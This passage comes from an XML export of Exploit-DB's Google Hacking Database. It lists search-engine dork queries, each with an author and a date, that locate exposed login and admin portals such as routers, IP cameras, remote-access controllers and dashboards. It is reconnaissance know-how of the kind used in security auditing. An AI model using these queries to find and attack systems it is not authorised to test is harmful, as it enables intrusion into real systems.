<query>intitle:&quot;index of&quot; &quot;admin-login.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;admin-login.php&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8062</id>
<link>https://www.exploit-db.com/ghdb/8062</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;index of&quot; &quot;login.sh&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;login.sh&quot;
# Pages Containing Login Portals
# Date:13/02/2023
# Exploit Author: Anoop Kumar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;login.sh&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;login.sh&quot;</querystring>
<edb></edb>
<date>2023-02-13</date>
<author>Anoop Kumar</author>
</entry>
<entry>
<id>6256</id>
<link>https://www.exploit-db.com/ghdb/6256</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;index of&quot; pass.php</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; pass.php
Author: Hemant Patidar (HemantSolo)
Linkedin: https://www.linkedin.com/in/hemantsolo/
--
Ethical Hacker | Founder and CEO at Solo Securities,
Cyber Security Analyst at Ismile Technologies
Pursuing B.Tech Civil Engineering from SRM University
</textualDescription>
<query>intitle:&quot;index of&quot; pass.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; pass.php</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Hemant Patidar</author>
</entry>
<entry>
<id>3958</id>
<link>https://www.exploit-db.com/ghdb/3958</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;index&quot; intext:&quot;Login to the Administrative Interface&quot;</shortDescription>
<textualDescription>via Priyal Viroja</textualDescription>
<query>intitle:&quot;index&quot; intext:&quot;Login to the Administrative Interface&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index&quot; intext:&quot;Login to the Administrative Interface&quot;</querystring>
<edb></edb>
<date>2014-08-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>6616</id>
<link>https://www.exploit-db.com/ghdb/6616</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;InfoView&quot; + &quot;Log On to InfoView&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;InfoView&quot; + &quot;Log On to InfoView&quot;
# Pages containing login portals.
# Date: 15/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;InfoView&quot; + &quot;Log On to InfoView&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;InfoView&quot; + &quot;Log On to InfoView&quot;</querystring>
<edb></edb>
<date>2020-10-15</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6699</id>
<link>https://www.exploit-db.com/ghdb/6699</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Insurance Admin Login&quot; | &quot;(c) Copyright 2020 Cityline Websites. All Rights Reserved.&quot; | &quot;http://www.citylinewebsites.com&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Insurance Admin Login&quot; | &quot;© Copyright 2020 Cityline
Websites. All Rights Reserved.&quot; | &quot;http://www.citylinewebsites.com&quot;
# Admin Login Pages
# Date: 23/11/2020
# Exploit Author: Aydın Baran Ertemir
</textualDescription>
<query>intitle:&quot;Insurance Admin Login&quot; | &quot;(c) Copyright 2020 Cityline Websites. All Rights Reserved.&quot; | &quot;http://www.citylinewebsites.com&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Insurance Admin Login&quot; | &quot;(c) Copyright 2020 Cityline Websites. All Rights Reserved.&quot; | &quot;http://www.citylinewebsites.com&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Aydın Baran Ertemir</author>
</entry>
<entry>
<id>4365</id>
<link>https://www.exploit-db.com/ghdb/4365</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Integrated Dell Remote Access Controller 6 - Enterprise&quot;</shortDescription>
<textualDescription>Dell Remote Access Controller 6 - Enterprise Web Login Portals
Google Dork: intitle:&quot;Integrated Dell Remote Access Controller 6 -
Enterprise&quot;
Date: 2016-11-29
Author: Devendra Singh Solanki</textualDescription>
<query>intitle:&quot;Integrated Dell Remote Access Controller 6 - Enterprise&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Integrated Dell Remote Access Controller 6 - Enterprise&quot;</querystring>
<edb></edb>
<date>2016-11-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>7272</id>
<link>https://www.exploit-db.com/ghdb/7272</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Intelbras&quot; &quot;All Rights Reserved&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Intelbras&quot; &quot;All Rights Reserved&quot; -.com
# Pages Containing Login Portals
# Date: 15/09/2021
# Exploit Author: Mugdha Peter Bansode</textualDescription>
<query>intitle:&quot;Intelbras&quot; &quot;All Rights Reserved&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Intelbras&quot; &quot;All Rights Reserved&quot; -.com</querystring>
<edb></edb>
<date>2021-09-21</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>3866</id>
<link>https://www.exploit-db.com/ghdb/3866</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Internet Security Appliance&quot; &amp; intext:&quot;Enter Password and click Login&quot;</shortDescription>
<textualDescription>#Summary: ZyWall Firewall login portal
#Category: Various Online Devices
#Author: g00gl3 5c0u7</textualDescription>
<query>intitle:&quot;Internet Security Appliance&quot; &amp; intext:&quot;Enter Password and click Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Internet Security Appliance&quot; &amp; intext:&quot;Enter Password and click Login&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4041</id>
<link>https://www.exploit-db.com/ghdb/4041</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;InterWorx-CP&quot; &quot;Forgot your password&quot;</shortDescription>
<textualDescription>InterWorx Web Hosting Control Panel login pages.
- Andy G - twitter.com/vxhex</textualDescription>
<query>intitle:&quot;InterWorx-CP&quot; &quot;Forgot your password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;InterWorx-CP&quot; &quot;Forgot your password&quot;</querystring>
<edb></edb>
<date>2015-07-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6231</id>
<link>https://www.exploit-db.com/ghdb/6231</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Intranet Login&quot;</shortDescription>
<textualDescription># Dork:intitle:&quot;Intranet Login&quot;
# Lists Intranet Portals
# Author : Ambadi MP
</textualDescription>
<query>intitle:&quot;Intranet Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Intranet Login&quot;</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>7160</id>
<link>https://www.exploit-db.com/ghdb/7160</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;IP CAMERA&quot; &quot;User Login&quot; &quot;User Name&quot; &quot;Password&quot; &quot;Preview Stream&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;IP CAMERA&quot; &quot;User Login&quot; &quot;User Name&quot; &quot;Password&quot; &quot;Preview Stream&quot;
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: J. Igor Melo
</textualDescription>
<query>intitle:&quot;IP CAMERA&quot; &quot;User Login&quot; &quot;User Name&quot; &quot;Password&quot; &quot;Preview Stream&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IP CAMERA&quot; &quot;User Login&quot; &quot;User Name&quot; &quot;Password&quot; &quot;Preview Stream&quot;</querystring>
<edb></edb>
<date>2021-09-06</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6691</id>
<link>https://www.exploit-db.com/ghdb/6691</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;irz&quot; &quot;router&quot; intext:login gsm info -site:*.com -site:*.net</shortDescription>
<textualDescription># Google Dork: intitle:&quot;irz&quot; &quot;router&quot; intext:login gsm info -site:*.com -site:*.net
# Title: IRZ router login page
# Date: 11/18/2020
# Author: Diego Gonzalez (shell_wizard)
Have a nice day ;)
Diego Gonzalez</textualDescription>
<query>intitle:&quot;irz&quot; &quot;router&quot; intext:login gsm info -site:*.com -site:*.net</query>
<querystring>https://www.google.com/search?q=intitle:&quot;irz&quot; &quot;router&quot; intext:login gsm info -site:*.com -site:*.net</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Diego Gonzalez</author>
</entry>
<entry>
<id>7011</id>
<link>https://www.exploit-db.com/ghdb/7011</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ISPConfig&quot; &quot;Powered by ISPConfig&quot; &quot;login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ISPConfig&quot; &quot;Powered by ISPConfig&quot; &quot;login&quot;
# Pages Containing Login Portals
# Date: 14/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;ISPConfig&quot; &quot;Powered by ISPConfig&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ISPConfig&quot; &quot;Powered by ISPConfig&quot; &quot;login&quot;</querystring>
<edb></edb>
<date>2021-06-25</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>599</id>
<link>https://www.exploit-db.com/ghdb/599</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ISPMan : Unauthorized Access prohibited&quot;</shortDescription>
<textualDescription>ISPMan is a distributed system to manage components of ISP from a central management interface.No vulnerabilities are reported to security focus.</textualDescription>
<query>intitle:&quot;ISPMan : Unauthorized Access prohibited&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22ISPMan+%3A+Unauthorized+Access+prohibited%22</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7460</id>
<link>https://www.exploit-db.com/ghdb/7460</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Issabel login - page&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Issabel login - page&quot;
# Pages Containing Login Portals
# Date:19/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>intitle:&quot;Issabel login - page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Issabel login - page&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>441</id>
<link>https://www.exploit-db.com/ghdb/441</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ITS System Information&quot; &quot;Please log on to the SAP System&quot;</shortDescription>
<textualDescription>Frontend for SAP Internet Transaction Server webgui service.</textualDescription>
<query>intitle:&quot;ITS System Information&quot; &quot;Please log on to the SAP System&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22ITS+System+Information%22+%22Please+log+on+to+the+SAP+System%22</querystring>
<edb></edb>
<date>2004-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>7495</id>
<link>https://www.exploit-db.com/ghdb/7495</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Journal&quot; inurl:&quot;login.aspx&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Journal&quot; inurl:&quot;login.aspx&quot;
# Pages Containing Login Portals
# Date:26/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;Journal&quot; inurl:&quot;login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Journal&quot; inurl:&quot;login.aspx&quot;</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7461</id>
<link>https://www.exploit-db.com/ghdb/7461</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Juniper Networks Web&quot; &quot;Log In&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Juniper Networks Web&quot; &quot;Log In&quot;
# Pages Containing Login Portals
# Date:19/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>intitle:&quot;Juniper Networks Web&quot; &quot;Log In&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Juniper Networks Web&quot; &quot;Log In&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>7970</id>
<link>https://www.exploit-db.com/ghdb/7970</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;JupyterHub&quot; inurl:/hub/login</shortDescription>
<textualDescription># Google Dork: intitle:&quot;JupyterHub&quot; inurl:/hub/login
# Category: Pages Containing Login Portals
# Date: 18/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;JupyterHub&quot; inurl:/hub/login</query>
<querystring>https://www.google.com/search?q=intitle:&quot;JupyterHub&quot; inurl:/hub/login</querystring>
<edb></edb>
<date>2022-07-18</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7569</id>
<link>https://www.exploit-db.com/ghdb/7569</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Kerio Connect Client&quot; inurl:&quot;/webmail/login/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Kerio Connect Client&quot; inurl:&quot;/webmail/login/&quot;
# Pages Containing Login Portals
# Date:2/11/2021
# Exploit Author: Nisrin Ahmed</textualDescription>
<query>intitle:&quot;Kerio Connect Client&quot; inurl:&quot;/webmail/login/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Kerio Connect Client&quot; inurl:&quot;/webmail/login/&quot;</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Nisrin Ahmed</author>
</entry>
<entry>
<id>7057</id>
<link>https://www.exploit-db.com/ghdb/7057</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;KNX-IP-Gateway Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;KNX-IP-Gateway Login&quot;
# Category: Pages Containing Login Portals
# Date: 05/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;KNX-IP-Gateway Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;KNX-IP-Gateway Login&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>885</id>
<link>https://www.exploit-db.com/ghdb/885</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Kurant Corporation StoreSense&quot; filetype:bok</shortDescription>
<textualDescription>These are Kurant StoreSense admin logon pages.</textualDescription>
<query>intitle:&quot;Kurant Corporation StoreSense&quot; filetype:bok</query>
<querystring>https://www.google.com/search?q=filetype%3Abok+intitle%3A%22Kurant+Corporation+StoreSense%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-03-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5685</id>
<link>https://www.exploit-db.com/ghdb/5685</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;LABVANTAGE Logon&quot;</shortDescription>
<textualDescription>Login Portal:
intitle:&quot;LABVANTAGE Logon&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;LABVANTAGE Logon&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;LABVANTAGE Logon&quot;</querystring>
<edb></edb>
<date>2020-01-09</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7118</id>
<link>https://www.exploit-db.com/ghdb/7118</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;LaCie&quot; &quot;login&quot; intext:&quot;Remember me&quot; &quot;Connect to&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;LaCie&quot; &quot;login&quot; intext:&quot;Remember me&quot; &quot;Connect to&quot;
# Category: Pages Containing Login Portals
# Date: 04/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;LaCie&quot; &quot;login&quot; intext:&quot;Remember me&quot; &quot;Connect to&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;LaCie&quot; &quot;login&quot; intext:&quot;Remember me&quot; &quot;Connect to&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7117</id>
<link>https://www.exploit-db.com/ghdb/7117</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Lantronix&quot; intext:&quot;Lantronix, Inc&quot; &quot;login to&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Lantronix&quot; intext:&quot;Lantronix, Inc&quot; &quot;login to&quot; -.com
# Category: Pages Containing Login Portals
# Date: 04/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Lantronix&quot; intext:&quot;Lantronix, Inc&quot; &quot;login to&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Lantronix&quot; intext:&quot;Lantronix, Inc&quot; &quot;login to&quot; -.com</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>s Thakur</author>
</entry>
<entry>
<id>911</id>
<link>https://www.exploit-db.com/ghdb/911</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ListMail Login&quot; admin -demo</shortDescription>
<textualDescription>Listmail mailinglist manager admin logon</textualDescription>
<query>intitle:&quot;ListMail Login&quot; admin -demo</query>
<querystring>https://www.google.com/search?q=intitle:%22ListMail+Login%22+admin+-demo&amp;filter=0</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5425</id>
<link>https://www.exploit-db.com/ghdb/5425</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Local Run Manager&quot; intext:&quot;Local Run Manager Version:&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;Local Run Manager&quot; intext:&quot;Local Run Manager Version:&quot;
Author: M. Cory Billington
Info: Web portals for Local Run Manager software from Illumina
</textualDescription>
<query>intitle:&quot;Local Run Manager&quot; intext:&quot;Local Run Manager Version:&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Local Run Manager&quot; intext:&quot;Local Run Manager Version:&quot;</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>M. Cory Billington</author>
</entry>
<entry>
<id>5159</id>
<link>https://www.exploit-db.com/ghdb/5159</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Log In - Juniper Web Device Manager&quot;</shortDescription>
<textualDescription>Search: Log In - Juniper Web Device Manager
Google Dorks: intitle:&quot;Log In - Juniper Web Device Manager&quot;
Category : Various Online Devices
Exploit Author:- Harsh Mukeshbhai Joshi
</textualDescription>
<query>intitle:&quot;Log In - Juniper Web Device Manager&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Log In - Juniper Web Device Manager&quot;</querystring>
<edb></edb>
<date>2019-03-22</date>
<author>Inspira Enterprise Pvt Ltd</author>
</entry>
<entry>
<id>7126</id>
<link>https://www.exploit-db.com/ghdb/7126</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Log In - Seafile Server&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Log In - Seafile Server&quot;
# Pages Containing Login Portals
# Date: 20/07/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;Log In - Seafile Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Log In - Seafile Server&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4988</id>
<link>https://www.exploit-db.com/ghdb/4988</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Log in - WhatsUp Gold&quot;</shortDescription>
<textualDescription>Description: This google dork can expose the landing log in page for
WhatsUp Gold network monitoring tool.
Here's the published CVE link for WhatsUp Gold:
https://www.cvedetails.com/vulnerability-list/vendor_id-193/product_id-3865/Ipswitch-Whatsup-Gold.html
Author: Zulfikar Azhari
</textualDescription>
<query>intitle:&quot;Log in - WhatsUp Gold&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Log in - WhatsUp Gold&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Zulfikar Azhari</author>
</entry>
<entry>
<id>5767</id>
<link>https://www.exploit-db.com/ghdb/5767</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Log In JIRA&quot; inurl:&quot;8080:/login.jsp&quot;</shortDescription>
<textualDescription>The following dork gives you an extensive search result for login pages of
JIRA
intitle:&quot;Log In JIRA&quot; inurl:&quot;8080:/login.jsp&quot;
By Juveria Banu
</textualDescription>
<query>intitle:&quot;Log In JIRA&quot; inurl:&quot;8080:/login.jsp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Log In JIRA&quot; inurl:&quot;8080:/login.jsp&quot;</querystring>
<edb></edb>
<date>2020-03-04</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>3795</id>
<link>https://www.exploit-db.com/ghdb/3795</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Log In&quot; &quot;Access unsecured content without logging in&quot;</shortDescription>
<textualDescription>iOmega Storcenter login page:
intitle:&quot;Log In&quot; &quot;Access unsecured content without logging in&quot;
Greetings,
Alrik</textualDescription>
<query>intitle:&quot;Log In&quot; &quot;Access unsecured content without logging in&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Log In&quot; &quot;Access unsecured content without logging in&quot;</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7062</id>
<link>https://www.exploit-db.com/ghdb/7062</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login - Hitron technologies&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login - Hitron technologies&quot;
# Category: Pages Containing Login Portals
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Login - Hitron technologies&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login - Hitron technologies&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7119</id>
<link>https://www.exploit-db.com/ghdb/7119</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login - Ipswitch WhatsUp Professional&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login - Ipswitch WhatsUp Professional&quot;
# Category: Pages Containing Login Portals
# Date: 05/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Login - Ipswitch WhatsUp Professional&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login - Ipswitch WhatsUp Professional&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>s Thakur</author>
</entry>
<entry>
<id>8290</id>
<link>https://www.exploit-db.com/ghdb/8290</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login - Jorani&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login - Jorani&quot;
# Pages Containing Login Portals
# Date: 31/10/2023
# Exploit Bipin Jitiya</textualDescription>
<query>intitle:&quot;Login - Jorani&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login - Jorani&quot;</querystring>
<edb></edb>
<date>2023-10-31</date>
<author>Bipin Jitiya</author>
</entry>
<entry>
<id>4396</id>
<link>https://www.exploit-db.com/ghdb/4396</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login - OpenStack Dashboard&quot; inurl:&quot;dashboard&quot;</shortDescription>
<textualDescription>Found this: intitle:&quot;Login - OpenStack Dashboard&quot; inurl:&quot;dashboard&quot;
Verónica Ovando (AKA verovan)
</textualDescription>
<query>intitle:&quot;Login - OpenStack Dashboard&quot; inurl:&quot;dashboard&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login - OpenStack Dashboard&quot; inurl:&quot;dashboard&quot;</querystring>
<edb></edb>
<date>2017-02-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6464</id>
<link>https://www.exploit-db.com/ghdb/6464</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login - OpenStack Dashboard&quot; inurl:/dashboard/auth/login</shortDescription>
<textualDescription>Google Dork: intitle:&quot;Login - OpenStack Dashboard&quot;
inurl:/dashboard/auth/login
Description: This dork lists all the login portals to OpenStack Dashboard.
Author: Sibi Mathew George
</textualDescription>
<query>intitle:&quot;Login - OpenStack Dashboard&quot; inurl:/dashboard/auth/login</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login - OpenStack Dashboard&quot; inurl:/dashboard/auth/login</querystring>
<edb></edb>
<date>2020-08-05</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>7007</id>
<link>https://www.exploit-db.com/ghdb/7007</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login - otrs&quot; &quot;Login&quot; &quot;Powered by OTRS&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;login - otrs&quot; &quot;Login&quot; &quot;Powered by OTRS&quot;
# Pages Containing Login Portals
# Date: 17/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;login - otrs&quot; &quot;Login&quot; &quot;Powered by OTRS&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login - otrs&quot; &quot;Login&quot; &quot;Powered by OTRS&quot;</querystring>
<edb></edb>
<date>2021-06-18</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>3877</id>
<link>https://www.exploit-db.com/ghdb/3877</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login - OTRS&quot; inurl:pl</shortDescription>
<textualDescription>#Summary: OTRS login portals
#Author: g00gl3 5c0u7</textualDescription>
<query>intitle:&quot;Login - OTRS&quot; inurl:pl</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login - OTRS&quot; inurl:pl</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>482</id>
<link>https://www.exploit-db.com/ghdb/482</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login - powered by Easy File Sharing Web Server&quot;</shortDescription>
<textualDescription>Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.)&quot;. More information at: http://www.securityfocus.com/bid/11034/discussion/An attacker can reportedly bypass the authentication by entering the the name of the virtual folder directly.</textualDescription>
<query>intitle:&quot;Login - powered by Easy File Sharing Web</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Login+-+powered+by+Easy+File+Sharing+Web+Server%22+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>7982</id>
<link>https://www.exploit-db.com/ghdb/7982</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login - Residential Gateway&quot;</shortDescription>
<textualDescription> Google Dork: intitle:&quot;Login - Residential Gateway&quot;
# Pages Containing Login Portals
# Date: 20/07/2022
# Exploit Author: s Thakur</textualDescription>
<query>intitle:&quot;Login - Residential Gateway&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login - Residential Gateway&quot;</querystring>
<edb></edb>
<date>2022-07-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7226</id>
<link>https://www.exploit-db.com/ghdb/7226</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login - splunk&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Login - splunk&quot;
# Pages Containing Login Portals
# Date: 14/09/2021
# Exploit Author:Saiju Pillai</textualDescription>
<query>intitle:&quot;Login - splunk&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Login - splunk&quot;</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Saiju Pillai</author>
</entry>
<entry>
<id>4730</id>
<link>https://www.exploit-db.com/ghdb/4730</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login credit&quot; &quot;login&quot;</shortDescription>
<textualDescription>Login portals mainly from finance/banking websites
Bruno Schmid
</textualDescription>
<query>intitle:&quot;login credit&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login credit&quot; &quot;login&quot;</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4731</id>
<link>https://www.exploit-db.com/ghdb/4731</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;login form&quot; &quot;powered by&quot; -tutorial</shortDescription>
<textualDescription>Many login portals from several frameworks.
Also try intitle:&quot;login form&quot; &quot;powered by&quot; | &quot;CMS&quot; -tutorial
Bruno Schmid
</textualDescription>
<query>intitle:&quot;login form&quot; &quot;powered by&quot; -tutorial</query>
<querystring>https://www.google.com/search?q=intitle:&quot;login form&quot; &quot;powered by&quot; -tutorial</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>1129</id>
<link>https://www.exploit-db.com/ghdb/1129</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Login Forum Powered By AnyBoard&quot; intitle:&quot;If you are a new user:&quot; intext:&quot;Forum Powered By AnyBoard&quot; inurl:gochat -edu</shortDescription>
